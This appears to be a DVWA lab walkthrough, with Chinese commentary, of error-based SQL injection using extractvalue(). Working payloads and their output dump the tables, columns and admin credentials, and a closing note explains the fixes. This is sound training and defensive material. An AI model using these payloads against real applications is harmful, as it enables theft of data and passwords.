admin’ and extractvalue(1,concat(’~’,(select user()),’~’))#
'~root@localhost~'admin’ and extractvalue(1,concat(’~’,(select database()),’~’))#
'~dvwa~'admin’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 0,1),’~’))#
guestbook '~users~'admin’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 1,1),’~’))#
admin’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 2,1),’~’))#
第三条查询（limit 2,1）没有再报出新的表名，证明 dvwa 库中只有两张表：guestbook 和 users。
开始爆 users 表的列名
admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1),’~’))#
'~user_id~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 1,1),’~’))#
'~first_name~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 2,1),’~’))#
'~last_name~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 3,1),’~’))#
'~user~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 4,1),’~’))#
'~password~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 5,1),’~’))#
'~avatar~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 6,1),’~’))#
'~last_login~'.
.
.
.
admin’ and extractvalue(1,concat(’~’,(select concat(user) from dvwa.users limit 0,1),’~’))#
'~admin~'.
.
.
.
admin’ and extractvalue(1,concat(’~’,(select concat(password) from dvwa.users limit 0,1),’~’))#
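5f4dcc3b5aa765d61d8327deb882cf9
（注意：这里只有 31 位十六进制字符，而 MD5 摘要应为 32 位。extractvalue 的 XPATH 报错信息最多显示 32 个字符，开头的 ~ 占去一位，所以这个值的最后一位被截断，并不是完整的哈希。）
（从防御角度看，上面的结果说明用户输入被直接拼进了 SQL 语句，数据库的报错信息又原样回显到页面上，而且口令看起来只做了 MD5 处理；对应的修复是使用参数化查询、不向用户返回数据库报错细节，并改用带盐的慢哈希算法存储口令。）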